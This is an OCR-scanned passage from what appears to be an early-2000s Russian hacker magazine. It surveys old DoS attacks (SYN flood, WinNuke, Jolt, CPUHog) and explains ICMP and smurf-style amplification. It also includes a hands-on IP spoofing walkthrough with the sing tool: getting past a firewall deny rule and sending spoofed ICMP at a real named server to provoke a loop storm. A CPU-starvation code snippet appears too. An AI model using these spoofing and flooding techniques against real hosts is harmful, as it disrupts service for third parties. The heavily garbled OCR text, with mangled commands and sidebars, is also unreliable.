все уже знают об этом нехитром способе DoS’a. Проапгрей- 
женный TCP/IP стек не будет реагировать на пакеты, исходя- 
щие от своего же компа, а мудрые маршрутизаторы могут за- 
просто не пропустить глючное послание смерти :(. А когда-то 
Land рулил немерено. Кстати, на его примере очень хорошо 
видно, КАК надо бороться с 3.142005’ами - левые пакеты 
просто не доходят до жертв из-за мудрой работы сети на ап- 
паратном уровне. Так что надо становиться умнее и творить 
зло-атаки нестандартными средствами. 


S¥N Flood 


Уязвимы: все, кроме Linux и Solaris 

Тип: полоса пропускания + ошибки программирования 

Вот и обещанное зло без хитростей и левостей. В этой атаке 
главное оружие - самые обыкновенные пакеты синхрониза- 
ции, о которых мы только что вспоминали (TCP SYN). Чтобы 
понять все прелести этого DoS’a, углубимся в его техническую 
сторону. После получения первого пакета из цепочки (SYN) 
комп должен послать отправителю подтверждение на прием 
данных (пакет SYN-ACK), мол, готов к труду и обороне. Главная 
бага в том, что, послав злосчастное подтверждение, жертва 
будет ждать на него ответа (пакет АСК) довольно долго и пре- 
рвет процесс установки связи только тогда, когда пройдет от- 
веденный на коннект промежуток времени. Как ты, видимо, 
уже догадался, ответ не придет никогда :), потому что в паке- 
тах кулхацкера стоит инвалидный обратный адрес, то есть ай- 
пишник отключенного от сети компа. Помимо основного эф- 
фекта - переполнения буфера из-за огромного числа “полуот- 
крытых” соединений, которые место занимают, а данные не 
передают - можно запросто зафлудить канал определенного 
протокола. Этим часто пользуются, чтобы прикрыть доступ к 
чужому сайту, фтпшнику или клиенту реег2реег: система бу- 
дет заниматься ложными соединениями, а на реальные у нее 
не хватит места и времени. Против линуха такая атака прин- 
ципиально не прокатит - он не сохраняет статусы соединения 
с одним и тем же компом в таблице, а просто отвечает на за- 
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просы. В итоге реальные соединения проходят без про- 
блем, а леваки отсеиваются сами :). Винды же можно 
защитить только одним способом - ограничить коли- 
чество соединений файрволом (это спасет от DoS’a, 
но не от флуда канала). 


Уязвимы: Win9x+WinNT 

Тип: ошибки программирования 

После распространения ВинНюка цифра 139 
стала даже более известной, чем 31337 :). Уж 
что-что, а нюкер держал в руках каждый. Но 
при этом многие хаксоры, успешно приме- 
нявшие HIOK, не знают элементарных 
принципов его работы :(. Будем разби- 
раться. Nuke пользуется страшной нелю- 
бовью 139 порта NetBIOS к нестандартному содержанию паке- 
тов (кто же знал при проектировке, что нехорошие люди будут 
совать туда всякий мусор?). На уровне сети все пакеты вполне 
ожидаемы, и система спокойно принимает ответы на свои за- 
просы. Если же пакет пришел сам по себе, да еще и забит ка- 
кой-то мурью, компу придется несладко. Помимо уже извест- 
ных тебе ТСР-пакетов SYN и АСК, существуют пакеты URGENT - 
срочные данные о работе сети. Нюкер генерирует URGENT-na- 
кеты с произвольным содержанием (изначально в них лежала 
фраза “nuke те” :)), помеченные как сообщение ОоВ (out of 
band, превышение пропускной способности сети). Получив та- 
кой пакетик, жертва не врубается (какое на хрен переполне- 
ние? все ж нормально!) и, в силу кривизны рук программеров 
MS, умирает с демонстрацией BSoD. Кстати, история борьбы MS 
vs Nuke до жути забавна: первая заплатка просто фильтровала 
пакеты, содержащие “пике те”. На что кулхацкеры ответили 
новой версией нюкера, в которой фразу для посылки можно 
было задать вручную :). Только после этого появился нормаль- 
ный апдейт, проверяющий правильность пакетов, прихо- 
дящих на 139 порт. 


Тип: недостаток ресурсов 
Все гениальное просто. Взглянув 
CPUHog, начинаешь понимать BC 
глубину этой фразы, ибо атака 
эта родилась от криворуко 
программера и бажной опера- 
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ционки :). Всем известно, что под МТ у процессов пользо- 
вателя есть 16 уровней приоритета, и задавать эти уров- 
ни можно прямо из прог. То есть злобный хацкер может 
создать прогу, которая выделяла бы себе наивысший 
приоритет (16) и не отдавала процессорное время ни- 
кому. Даже диспетчеру задач :). Самый простой ва- 
риант такой проги: 


SetThreadPriority(GetCurrentThread(), 
thread_priority_time_critical); 
while(1); 


Выставили высший приоритет и пошли му- 
чить проц бесконечным циклом :). Снять за- 

дачу нельзя, можно только ребутнуться. 

Учитывая возможность установления ше- 
стнадцатого приоритета из апплета ActiveX или модуля Нет- 
скапы, а также из с91-скриптов, есть только одна рекоменда- 
ция - юзать связку W2k-Opera. Особые извращенцы могут запу- 
скать диспетчер задач с высшим приоритетом, это поможет 
вытащить СРУНод из памяти. Хотя все это не избавляет Нод’а 
от его гениальной простоты ;). 


Уязвимы: ВСЕ винды, BeOs, большинство маршрутизаторов 
Тип: недостаток ресурсов 
Побродив по экзотике стандартных атак, мы все равно верну- 
лись к старой доброй фрагментации пакетов. Jolt позволяет 
мучить мощные машины, сидящие на широких каналах, с обыч- 
ного модема, в этом его большое преимущество перед другими 
фрагментными атаками. При помощи маленького эксплойта на 
жертву обрушивается поток одинаковых фрагментов пакетов, 
собрать которые невозможно. Но система этого не знает, по- 
этому раз за разом наступает на одни и те же грабли, отбирая 
у процессора тучу ресурсов. Детально атака вы- 
глядит так Каждый из.побланных фраг- 
4 ментов" пакета т длину в 29 
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9). Каждый из фрагментов нахально заявляет, что он послед- 
ний в цепочке, а перед ним прошло уже 65520 байт инфы. На 
самом деле, все вполне законно, пакеты длиной в 65529 байт 
вполне легальны, но система оперирует не реальными данны- 
ми, а данными из заголовка. Поэтому для нее общий размер 
большого пакета, который ей надо было бы собрать, будет ра- 
вен 65520+48=65568, а это превышает максимальную длину 
]Р-пакета. Вот такой хитровымученный глюк. Тратя все про- 
цессорное время на анализ таких пакетов, комп будет не в со- 
стоянии заниматься чем-то еще. Несмотря на то, что некото- 
рые файрволы ловят такие битые пакеты, атака на непропат- 
ченные системы может быть вполне успешна. 


Уязвимы: WinNT 
Тип: недостаток ресурсов 

Было время, когда этой атакой скромные дайлапщики валили 
мегатонные сервера на NT. Простейшим способом (о нем ни- 
же) убивались RPC, ISS и 0№ службы, а процессор оставался 
перегруженным до ребута. Метод простой - прителнетиться к 
порту службы (135 - RPC, 1031 - ISS, 53 - DNS) и прогнать туда 
любую пургу объемом больше 10 символов. Все, служба на- 
прягает проц в попытках узнать, что же у нее спрашивают, сер- 
вак тормозит, админ жмет Reset %). А используя мелкие ути- 
литы с говорящими именами типа PortFuck, можно повторять 
этот процесс раз за разом. В итоге один маленький, но злоб- 
ный чел с коннектом в 19200 мог убить сервак на все время 
своего сидения в Инете - просто в фоне у него раз в пять ми- 
нут кидался глючный запрос серверу. И тот либо тормозил, ли- 
бо постоянно ребутался админом. 


Уязвимы: Win98+Win2k+Linux (!) 
Тип: насыщение полосы пропускания + недостаток ресур- 
сов + ошибки программирования 

Современная DoS-ataka, которая напрочь вешает Win9x и 
заставляет не по-детски тормозить винтукей и некоторые 
реализации Линуха. Суть атаки заключается в массовой от- 
сылке жертве туч IP-nakeToB со случайными данными, кото- 
рые на самом деле ТР-пакетами не являются %). Замороче- 
но, но тем не менее очень эффективно. Посланные пакеты 
создают в сети атакуемой машины дикое число коллизий, 
тормозя и работу сети в целом. Непонятно, почему пакеты с 
абсолютно левым содержанием не отсеиваются, а проходят 
на обработку даже в 2000х с сервиспаком. Но это пробле- 
мы М5, не так ли :)? Нас должна радовать возможность ука- 
зать IP для подмены прямо в командной строке эксплойта, 
такая фича есть не у многих. Поскольку другие эксплойты 
реальными средствами реально шлют реальные пакеты, ко- 
торые отличаются только специфическим содержанием, 
подделать в них исходный айпишник - большая проблема. А 
Бубоник просто генерит пакеты произвольного наполнения 
и закидывает их жертве :). Грубая сила доказывает свое 
превосходство над интеллектом :). 


Уязвимы: WinNT+9x+ME 
Тип: ошибки программирования 

Эта атака - продолжатель славного дела нюкеров. Тот же 139 
порт, только теперь мы работаем на уровне ТСР/ТР. Для оче- 
редной серии непредсказуемых последствий достаточно на- 
бросать 139-му тучу некорректных или фрагментированных 
(а лучше и то, и другое :)) пакетов, сгенеренных любой под- 
ходящей прогой. Если система и не гикнется, то на время ата- 
ки доступ к ней со стороны других юзеров будет полностью 
прекращен, так как на обработку обращений к расшаренным 
ресурсам не будет времени :). Атака неправильными пакета- 
ми TCP/IP - одна из самых применяемых сейчас, так что дер- 
жи 139 порт закрытым (для TCP/IP соединений) и не шарь 
свое добро. = 
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ЧТО ТАКОЕ IP СПУФИНГ? 
P - самый базовый протокол в стеке TCP/IP, все 
остальные протоколы являются надстройками 
над ним, поэтому вынуждены играть по его 
правилам. А по правилам протокола ТР, пакет, 
передаваемый по сети, должен иметь поля Source 
ТР (адрес отправителя) и destination IP (адрес 
получателя). Врать не буду - точно не знаю, но если не все 
протоколы, то во всяком случае те из них, которые 
используются для клиент-серверных сеансов связи, в 
обязательном порядке должны придерживаться этой 
инструкции. Иначе ничего работать не будет: если нет 
адреса получателя, то неизвестно, куда такой пакет слать, 
если нет адреса отправителя - непонятно, зачем этот пакет 
пришел, так как невозможно на него ответить (некуда!). 
Итак, любое сетевое устройство (будь то получатель или 
что-нибудь промежуточное), получив пакет, всегда знает, 
от кого и к кому он идет. Подытожили, блин ;). 
Теперь давай подумаем, а каким образом source ТР и desti- 
nation IP попадают внутрь пакета? Hy, они записываются в 
пакет программным кодом, который этот пакет формирует. 
А откуда они берутся? Destination IP задает пользователь 
(или приложение, или что-нибудь еще - вариантов куча, все 
не перечислишь), когда вводит, скажем, “telnet 127.0.0.1” 
(в данном случае - destination IP=127.0.0.1), a source IP 
берется автоматически из настроек системы. OK, теперь мы 
знаем, что в каждом пакете есть destination IP и source IP, а 
также как они в этот самый пакет попадают. А теперь я 
скажу, что такое ip spoofing (да ты и сам, наверное, уже 
знаешь ;)). Ip spoofing - это подмена реально source IP в 
пакете на ложный. То есть комп шлет пакет (много пакетов), 
а в поле “адрес отправителя” ставит не свой ТР, а чужой 
(или вообще не существующий). Вот тут-то и начинается 
веселье: Инет построен так, что проверить достоверность 
указанного в пакете source IP очень сложно. На этом и 
построено огромное количество разрушительных DoS-atak. 
Например, 00$-умножение и циклические пакетные шторма. 


КАК ЭТО ДЕЛАЕТСЯ? 

Хватит теории, давай перейдем к конкретным действиям :). 
Теоретически существует два способа подменить source IP 
в пакете: изменить ТР своей системы на нужный, чтоб он 
автоматически добавился в пакет, когда тот будет 
формироваться, или сформировать пакет самостоятельно, 
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записав в него какой угодно source ТР. Второй способ 
значительно лучше, если не сказать, что первый вообще 
очень сомнительный. Дело в том, что, во-первых, ТР, на 
который перенастраивается система, должен быть 
свободен, а во-вторых, ответы будут приходить на этот же 
IP, а он уже стал IP шником нашей системы - это уже не 
спуфинг. Так что катит только первый способ. Но, как 
обычно бывает в таких случаях, он гиморный :(. Если 
делать все правильно, придется компилировать, 
программировать и т.д. Если это тебя не пугает, поищи на 
поисковиках следующие вещи: ipspoof.c, IP-spoof-2.txt, 
spoofit.h, spoof.c. Это исходники и библиотеки на сиях, 
реализующие спуфинг. Разобраться будет сложно, так как 
все эти проги ориентированы на спуфинговые атаки, при 
которых атакующий не просто отправляет пакеты не со 
своим родным ТР внутри, но и продолжает поддерживать 
связь с атакуемым, постоянно выдавая себя за другого. При 
0о5-атаках это не требуется - достаточно просто отправить 
пакеты, не заботясь об их дальнейшей судьбе (главное - 
отправлять их постоянно и побольше ;)). Так что то, что 
лежит в этих исходниках, на порядок сложнее того, что 
нужно нам. Спрашивается: зачем себя мучить, ломая 
лишний раз голову над сложными проблемами, если можно 
воспользоваться уже готовыми тулзами? Согласен, 
разобравшись с spoofit.h и ipspoof.c один раз, всегда 
можно будет написать конкретную прогу для конкретных 
целей, и это будет правильнее, чем пользоваться уже 
готовыми тулзами. Но бошка ведь тоже не железная и 
имеет свойство раскалываться, если всегда все делать по 
максимуму правильно и дотошно :). Так что давай сделаем 
так: кодинг я оставлю на твое усмотрение, а сам тебе 
расскажу про проги, при помощи которых можно спокойно 
спуфить и устраивать злейшие 0о5-атаки, особо He 
напрягаясь. 


SING-1.1 
Что нужно, чтоб организовать 0о5-умножение? Правильно, 
отправить какой-нибудь пинг на широковещательный адрес 
здоровенной сети, подменив в нем 5оигсе ТР на айпишник 
жертвы. Стало быть, нужна такая прога, которая умеет 
отправлять ТСМР-пакеты, подменяя в них адрес 
отправителя. Такая прога есть :). Называется sing и имеет 
текущую версию 1.1. Скачать можно тут: 

p:// d n ‘. После даунлода 
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архивчик надо распаковать, а полученный исходник 
отконфигурировать (./configure), откомпилировать (make) и 
проинсталлировать (make install) - если тебя все это парит, 
скачай какую-нибудь грт` ку (или какой у тебя там дистриб 
линя?). Теперь прогу можно вызвать, набрав в командной 
строке “sing”. Sing - это сетевая тулза, умеющая 
формировать практически любые ТСМР-пакеты, спуфить 
адрес в них и даже определять удаленную OC (последнее 
вряд ли может пригодиться, так как есть птар, который 
великолепно справляется с этой задачей). Итак, sing 
установлен: первым делом ввожу: 

sing 127.0.0.1 


Отлично, пропинговалось. Теперь попробую поспуфить: 
sing -S 127.0.0.2 127.0.0.1 


Вроде все хорошо - спуфенный пинг прошел (пакеты 
вернулись, т.к. я пока использую loopback). Но мне хочется 
проверить, все ли ок. Давай я запрещу файрволу пропускать 
любые пакеты с 127.0.0.1, попробую пропинговаться 
обычным ping OM (который, естественно, все будет слать с 
127.0.0.1), а потом попробую пролезть через файрвол 

sing om, меняя 127.0.0.1 на 127.0.0.2. Ввожу: 


ipchains -A input -5 127.0.0.1 -j DENY 
ipchains -L 


и вижу, что теперь все пакеты с 127.0.0.1 отбрасываются. 


= 


Пингую обычным ping ом: 
ping 127.0.0.1 


Восемь пакетов ушло, вернулось - ноль. Естественно, ведь 
файрвол все блокирует. 


Теперь то же самое, HO Sing OM и со спуфом: 
sing -5 127.0.0.2 127.0.0.1 
Опппа!!! Все получилось! Sing обдурил файрвол, 


прикинувшись, что пакеты идут с 127.0.0.2, а нес 127.0.0.1, 
который блокируется! 


А пакеты вернулись потому, что я использовал Loopback: моя 
система слала ответы на 127.0.0.2, но они пришли к ней же 
обратно, так как это, как и 127.0.0.1, тоже ее петлевой 
адрес. Хорошо, теперь попробуем проделать то же самое с 
удаленной системой. Я буду иллюстрировать все на примере 
сервака m-net.arbornet.org (да не обидятся на меня его 
админы ;)). Сначала просто пингую (ping om или sing om 
без спуфа - все равно): 


ping m-net.arbornet.org 


Сервак отвечает - все хорошо. 


А теперь отправляю серваку несколько пакетов, типа от него 
же самого (так вызываются циклические ТСМР-штормы: 
сервак получает пакеты вроде как от себя, отвечает на них 
самому же себе, и так много раз, пока не наступит 
3.142005): 


sing -S m-net.arbornet.org m-net.arbornet.org 
Отправлено одиннадцать пакетов, вернулось - ноль. 


Естественно, сервак отвечал на мои пакеты самому себе, 
поэтому мне ничего не пришло. И не надо :). 


Как видишь, все сработало :). Можно досить спуфом, не 
ковыряясь во всяком коде! Не думаю, что мои пакеты могли 
нанести arbornet y какой-либо ущерб - во-первых, их было 
слишком мало, во-вторых, на арборнете сидят грамотные 
админы, и они, наверное, догадались настроить систему так, 
чтоб она не отвечала на свои собственные ТСМР-пакеты ;). 
Тем не менее, мы с тобой, приятель, разобрались в довольно 
гиморном вопросе. Надеюсь, тебе понравилось ;). До новых 
встреч, и удачных тебе экспериментов в net security!!! 


СООБЩА MHE 


как работает протокол ICMP 


Матушка Лень 


Начинающие хакеры без продыху качают вредоносные 
программки из сети, с этими программами приходят 
троянцы и прочая нечисть. Так что береги здоровье - 
пользуйся презервативом. Хорошие знания сетевых 
ЧТОБЫ СТАТЬ стандартов и технологий - надежная резинка (но и сней залета- 
ют ;)). ТСМР - протокол, с которым так или иначе связаны при- 

НАСТОЯЩИМ мерно 70% всех DoS-atak. Так что его надо знать обязательно - 


XAKEPOM, этим мы сейчас и заморочимся. 


НЕДОСТАТОЧНО ПРОТОНОЛ 


Tyno Чтобы сильно не заморачиваться теорией, давай вспомним про TO, 
ИСПОЛЬЗОВАТЬ что можно пощупать. Щупать будем телефон. У телефона есть но- 
меронабератель, с его помощью ты вводишь номер абонента. АТС 
a 4 =М — анализирует номер абонента и соединяет твой телефонный аппа- 
РЕЦЕПТЫ рат с другим. Та же история и с протоколом ТР. Имеется ТР адрес - 
номер, по которому маршрутизаторы находят другой комп в сети. 
ВЗЛОМА. Ну а теперь представь, что тебе нужно передать данные. Допус- 
НУЖНО ЕЩЕ тим, ты решил послать к чертовой матери бабулю, живущую по Te- 
хорРОШ! О лефону ХХХ-ХХ-ХХ. Но чтобы бабуля получила твою инфу, нужно 
использовать протокол, который она поддерживает. Одним сло- 
me Pee BOM, нужно говорить с бабулей на одном языке. Но этого мало, 
ПРОИСХОДИТ. Я нужно использовать протокол, который поддерживает телефон- 
ная сеть, иначе как до бабули дойдет эта дико необходимая ин- 

НЕ ГОВОРНЭ, 


что 
ИСПОЛЬЗОВАТЬ 
ЧУЖИЕ 
РЕЦЕПТЫ 
плохо. 

Г Конечно, это 
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формация? Для входа в сеть тебе нужен телефон, который под- 
держивает протокол АТС. Если ты воспользуешься домофонным 
== телефоном, то ничего не выйдет, протокол другой. 

a ВРЕМЯ, ДА И Безобразие, когда один протокол используют для передачи дру- 


гого протокола, называют инкапсуляцией. То есть мат, адресован- 
ВЕЛОСИПЕД ный бабуле на другом конце провода, инкапсулируется в электри- 
ИЗОБРЕТАТЬ НЕ ческие колебания. Происходит дело так: у тебя рождаются мыс- 
ли, и твой рот упаковывает их в пакеты протокола “Великий Мо- 
ri a pesnlale (ae) vel гучий Русский Язык” (ВМРЯ). Потом телефон упаковывает паке- 
| и = УЧИ АА Та = — ты ВМРЯ в кадры протокола “Электричество Колбасит в Проводе” 
. ДОЛЖЕН (ЭКП). В таком виде твои нежности доходят до бабулиного теле- 
фона, телефон распаковывает пакеты ВМРЯ из кадров ЭКП. Бабу- 

ПОНИМАТЬ СУТЬ лины уши достают твои мысли из кадров ВМРЯ. 
РАБОТЫ Такая же штука происходит, если твой комп и комп твоей продви- 
ХАКЕРСКОГО нутой бабули находятся в одной локальной сети. Пакеты прото- 
кола IP (Internet Protocol) инкапсулируются в кадры локальной 


РЕЦЕПТА, сетки, проходят по сетке и распаковываются на другом компе. 
ИНАЧЕ ТЕБЯ 
HAK УСТРОЕН ПРОТОНОЛ? 
ПОДСТАВЯТ. 


Как ты понял, протокол нужен для того, чтобы передавать инфор- 
мацию между разными системами. Это и есть основная задача 
протокола. Протокол передает инфу в специальных контейнерах 
(пакетах или кадрах). Контейнер состоит из передаваемой ин- 
формации (данных) и заголовка. Заголо- 
вок нужен для того, чтобы выяснить, какие 
данные внутри, чтобы написать там адрес, 
чтобы поставить контрольную сумму дан- 
ных, чтобы правильно собрать несколько 
кусков данных. Вот, например, звонишь ты 
по телефону и говоришь заголовок: “При- 
вет, я буду говорить на русском, позовите 
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бабу Зину, я звонил вам вчера”. После ты передаешь поле с дан- 
ными: “Пошла к такой-то матери!”. 


ЧТО TAHOE ICMP? 

Internet Control Message Protocol - Интернет протокол управляю- 
щих сообщений. Все бы было хорошо, и ты бы спокойно общался 
бы с бабульками по телефону, если бы не постоянные баги в се- 
ти. Для того чтобы сообщать об ошибках, нужен протокол ICMP. 


СООБЩЕНИЕ 0 НЕДОСТИНИМОСТИ ПОРТА 

Самое простое дело. Допустим, ты звонишь бабуле на сотовый, а 
тебе и говорят: “Абонент недоступен или не отвечает”. Или ты 
звонишь на обычный телефон и слышишь короткие гудки. Все это 
сообщения о недостижимости абонента. 

А теперь то же самое, когда ты ломишься бабушке в порт по про- 


токолу ТР. Т.е. посылаешь бабушке ТР-пакет с ee ТР-адресом. Та- 
кой пакет еще датаграммой называют. А в ответ тебе приходит 
датаграмма с вложенным ТСМР. 


ЗОГОЛОВОН ICMP О HEQOCTHHHMOCTH ПОРТВ 

ТИП определяет, что это сообщение о недостижимости. По КОДуты 
узнаешь, что именно недоступно: сеть, хост, протокол, порт или тре- 
буется фрагментация. Контрольная сумма нужна для того, чтобы 
проверить, не испортилась ли инфа. И, наконец, в информационном 
поле тебе прикладывают исходную датаграмму, которая не дошла. 
Получается, бабушка тебе отвечает: ТИП: не могу понять, КОД: ниче- 
го не слышу, Контрольная сумма в моем сообщении букв, Информа- 
ционное поле: ты звонил мне по телефону ХХХ-ХХ-ХХ и сказал... 


А что это за странные циферки и плюсики в заголовке? 

Когда рисуют заголовок протокола, обязательно отмечают, сколь- 
ко бит уходит под каждое поле. Ведь каждое поле закодировано 
вереницей ноликов и единичек. А чтобы их не перепутать, у каж- 
дого бита есть свой номер. Заголовок на самом деле должен быть 
как одна длинная линеечка с номерами битов. Только такая лине- 
ечка не влезает на страницу. Чтобы удобней разместить на стра- 
нице длинную линеечку, ее разбивают на маленькие, и получает- 
ся бутерброд, или табличка. 


СООБЩЕНИЕ 0 ПРЕВЫШЕНИИ КОНТРОЛЬНОГО ВРЕМЕНИ 


ТИП: превысили время, КОД: превысили время жизни, или время 
при сборке. Остальное так же, как и в недостижимостях. У каждо- 
го пакета есть время жизни, поэтому застрявший в сети пакет с 
истекшим временем удаляют. Если инфа разбита на несколько 
пакетов, то на конце нужно их собрать. А как известно, семеро па- 
кетов одного не ждут и высылают сообщение с КОДом: “Нас упа- 
рило ждать этот пакет”. 


Т.е. тебе звонит телефонист и говорит: “Помнишь, ты звонил и по- 
сылал бабулю к чертовой матери? Так BOT, это сообщение у нас за- 
блудилось, и мы его удалили, так что посылай его снова”. Или ба- 
буля отвечает тебе: “Не могу полностью воспринять твое сообще- 
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ние, внучек, т.к. до меня не дошла буква “Ч” из слова “чертовой””. 


СООБЩЕНИЕ 0 ПРИОСТАНОВНЕ ИСТОЧНИНЯ 
ТИП: остановись! КОД: не используется. Если ты слишком интен- 
сивно отсылаешь пакеты в сеть, то у маршрутизатора или хоста 


переполняется буфер. Поэтому он удаляет лишние датаграммы и 
сообщает об этом отправителю. Отправитель обычно снижает 
скорость в ответ на такие послания. 

Звонишь бабуле и быстро что-то бормочешь. А она тебе в ответ: 
“Говори медленнее, я за тобой не успеваю. Поэтому твое сообще- 
ние про чертову мамашу я вообще удалила из памяти”. 


СООБЩЕНИЕ ОБ ИЗМЕНЕНИИ МАРШРУТЯ 

Допустим, бабуля сидит в офисе, и ты сначала дозваниваешься 
секретарю, он тебя соединяет с бабулей. Потом секретарь чешет 
репу и перезванивает тебе: “Чувак, а зачем ты додалбываешься 
до меня, когда у бабули есть прямой номер, по нему и звони!”. 


Так же и с маршрутизаторами. Если маршрутизатор увидел более 
короткий путь, чем до него, то он сообщает источнику адрес вхо- 
да на этот путь. ТИП: переадресация, КОД: для сети, для хоста или 
для услуг. Internet адрес шлюза: шлюз куда переадресуем. 


эно 

Тут объяснять особенно нечего, т.к. эти ICMP сообщения исполь- 
зует команда ping, которую все знают. ТИП: либо пингуем, либо 
отвечаем. КОД: не используется. Идентификатор и номер очере- 
ди нужны для того, чтобы узнать, все ли пакеты дошли по этому 
порту. Данные нужны для того, чтобы нагрузить сетку и протес- 
тить, какое время передаются данные. 


Звонишь бабуле и говоришь: я в твое левое ухо-порт пингую по- 
эму “Лука Мудищев” 3 раза. Ну и дальше читаешь поэму. Чтобы 
убедиться, что бабуля все правильно приняла, ты должен полу- 
чить от нее три раза “Мудищего” обратно. Если ты послал три за- 
проса, а получил только один ответ, то это говорит либо о загру- 
женности бабушкиного уха, либо о зашумленности в линии. Этот 
вид ТСМР сообщения состоит из запроса и ответа. 


СООБЩЕНИЕ 0 НЕПОНЯТНОЙ ОШИБНЕ 

Допустим ты высказал все бабуле на другом конце провода, а она 
тебе как выдаст ТСМР-сообщение с указателем на слово “чертова 
Mama”. Т.е. бабуля скажет: “Сынуля, что это за датаграмму ты при- 
слал такую загадочную, ведь что такое “чертова MaMa”, я не знаю”. 


Так же и маршрутизатор, обнаружив странную датаграмму, удалит 
ее, а тебе пришлет уведомление с указателем на номер бита, где 
обнаружена ошибка. КОД в этом сообщении не используется. 


ЗАПРОС МАСНИ 

Если ты решил связаться с компом из локалки, то нужно знать, где 
утебя адрес сети, а где идентификатор тачки. Для этого нужна ма- 
ска. Ее запрашивают с помощью специального ТСМР-запроса и 
получают в ТСМР-ответе. Идентификатор и номер нужны для того, 
чтобы определить, на какой запрос какой ответ пришел. ТИП оп- 
ределяет запрос/ответ. Код не используется. 

Это что-то типа позвонить телефонистке и спросить: «Туту вас жи- 
вет бабуля по номеру ХХХ-ХХ-ХХ. Не подскажите, какая у Hee ATC?» 


ЗАНЛЮЧЕНИЕ 

ICMP часто используют хакеры в DoS-atakax. Нет ничего при- 
ятнее, чем прислать пользователю ложный ICMP с сообщени- 
ем о диком количестве ошибок. Однако ТСМР только сообща- 
ет об ошибках, а что будет делать комп, сервер или маршру- 
тизатор, зависит от софта и настроек. Поэтому некоторые 
лишние функции ICMP во многих системах отключают в целях 
безопасности. = 
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лышал ли ты, что такое цепная 


реакция? Цепную реакцию запросто 

можно устроить из чего угодно. 

Например, расставил фишки домино 
рядышком, уронил одну и цепная реакция 
зацепила все остальные. Допустим, твоя 
задача оглушить толпу друзей, которые 
сидят в комнате. Но звук одной падающей 
доминошки очень тихий, чтобы порвать им 
Бараванные перепонки. A теперь представь, 
что миллиард доминошек руннули вместе. 
Готово атакованные уши твои друзей, 
наконец, оглонли! Ногда я учился в школе, 
мы делали такие штуки со школьными 
стульями, которые ставят на парты. 
Роняешь один стул и падает весь ряд. 


А теперь представь, что твой сосед крутой мега хакер Петя 
атакует сервер Microsoft. У Петьки стоит модем, на котором 
инфа разгоняется от 2 до 15 килобит в секунду, а у 
Майкрософта канал держит несколько десятков мегабит в 
секунду. Понятно, что даже если Петька забьет полностью 
свой канал, то серваку от этого не убудет. Зато зловредный 
администратор обязательно найдет в логах остатки 
Петиного спама и устроит репрессии. 


Есть вариант, когда Петя ломанул чужой сервер и долбает 
Микрософтину уже с него. Флудит наш герой с 
нормального канала, на котором висит этот сервер. 
Команды для сервера твой сосед, естественно, посылает по 
модему. Тут есть риск, что Петра заловит админ 
взломанного сервера. 


Есть еще вариант, когда Петр на митинге ФИДО 
договаривается с друзьями валить Микрософт вместе. Ну, 
и половина владельцев модемов всего бывшего СССР 
атакует вражеский сервак. Такая атака называется 
распределенной, если тебе удалось найти столько друзей 
или написать атакующий вирус. За вирус, кстати, можно 
сесть, равно как и за организацию преступной группы, 
атакующих друзей. 


Представь, что сосед решил устроить цепную реакцию в 
Интернет. То есть на один его запрос рождаются десятки 
ответов, от компов, которые сидят на неплохом канале. И 
эти ответы валят вражеский сервак. 


Мы тебе уже рассказывали в этом номере про протокол 
ICMP. Напоминаю, ICMP - это служебный протокол для 
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передачи сообщений об ошибках в интернете. В этом 
протоколе есть очень удобный тип пакетов - эхо. Этот вид 
ТСМР запросов нужен для того, чтобы протестить наличие 
удаленного хоста и проверить связь с ним. 


По-простому это называется пинговать. Есть такая 
программа PING. Ты ей указываешь ТР адрес, который 
хочешь проверить. Программа по этому адресу направляет 
ТСМР эхо запрос, в котором прописывает твой обратный 
адрес и тестовые данные (песенку про серенького козлика, 
к примеру). Если чужой комп доступен и на нем включен 
ТСМР, то он отсылает тебе ТСМР эхо-ответ. Твой ТР адрес 
чужой комп узнает из заголовка ТР. Простыми словами: ты 
послал тестовое письмо, и оно тебе пришло по обратному 
адресу. Если вернулось, то все хорошо. А если не 
вернулось, то адресат недоступен. Если вернулось с 
большой задержкой, то либо канал, либо комп тормозные. 


Допустим, хакер сидит на крутом серваке, а ты на модеме. 
Чтобы забить твой модемный канал достаточно тебя 
хорошенько пингонуть. Для того чтобы забить твой канал 
хакер использует ICMP эхо-запросы с огроменным 
тестовым блоком данных. При этом с его каналом все в 
порядке, так как он толще, чем твой. А твой канал давиться 
этим толстым блоком данных. 


Однако если твой канал не такой тонкий, как думал хакер, 
то ты сможешь определить его адрес, с помощью 
файрвола, например. ТР адрес хакера поможет взять его 
за задницу. 


А теперь представь, что хакер отправляет ТСМР эхо-запрос 
на чужой комп. А обратный адрес указывает твоего компа. 
Тогда добропорядочный чужой комп отвечает тебе ICMP 
эхо-ответом. Конечно, ты его ни о чем не спрашивал, но 
чужой комп думает, что ты спросил, и отвечает. Эти 
толстые ответы забивают твой канал. 


В таком случае хакера никак не поймать, ведь никак не 
узнаешь его обратный адрес. В логах 005 атаки стоит 
адрес ни в чем не повинного добропорядочного компа. А в 
логах этого добропорядочного компа стоит твой адрес и 
там тоже не прикопаешься. Вот и остается админам со 
спецслужбами отыскивать хакера по каким-то косвенным 
признакам. Если, например, он захочет как-то 
воспользоваться результатами атаки и полезет со своим ТР. 


Хакеру Пете все мало, поэтому он отправляет ТСМР эхо- 
запрос с твоим адресом для целой сети. То есть хакерский 
эхо-запрос с твоим адресом получат все компьютеры сети. 
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Атакуемый 
KOMN 


Sy Хакерский 
:. ое KOMN 


[СМР эхо запрос 
Адрес получателя: атакуемый комп 
Адрес отправителя: хакерский комп 


ICMP эхо ответ 
Адрес получателя: хакерский комп 
Адрес отправителя: атакуемый комп 


DoS_umnojenie_1.ai Хакерский компьютер атакует комп напрямую 


Атакуемый 
КОМП 


[СМР эхо ответ 
Адрес получателя: атакуемый комп 
Адрес отправителя: чужой комп 


ICMP эхо запрос 
Адрес получателя: чужой комп 
Адрес отправителя: атакуемый комп 


Хакерский 
komn 


DoS_umnojenie_2.ai Хакерский компьютер 
атакует комп с подложным адресом 


и 
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Атакуемый 
КОМП 


Адрес отправителя: комп из чужой сети №1 


Адрес отправителя: комп из чужой сети №2 


ICMP эхо ответ 


Адрес получателя: атакуемый комп 
Адрес отправителя: комп из чужой сети №100 


[СМР эхо запрос 


Адрес получателя: все компы чужой сети 
Адрес отправителя: атакуемый комп 


Хакерский 
Комп 


DoS_umnojenie_3.ai Хакерский компьютер атакует комп 


с подложным адресом, 


И каждый честный компьютер постарается ответить на 
такой запрос. Ответы на хакерский запрос получишь ты, и 
ответ будет не один. Количество хакерских ТСМР эхо- 
запросов умножается на количество компов в сети, так 
получается количество ТСМР эхо ответов. 


Эффект превосходит все ожидания, так как флуд идет по 
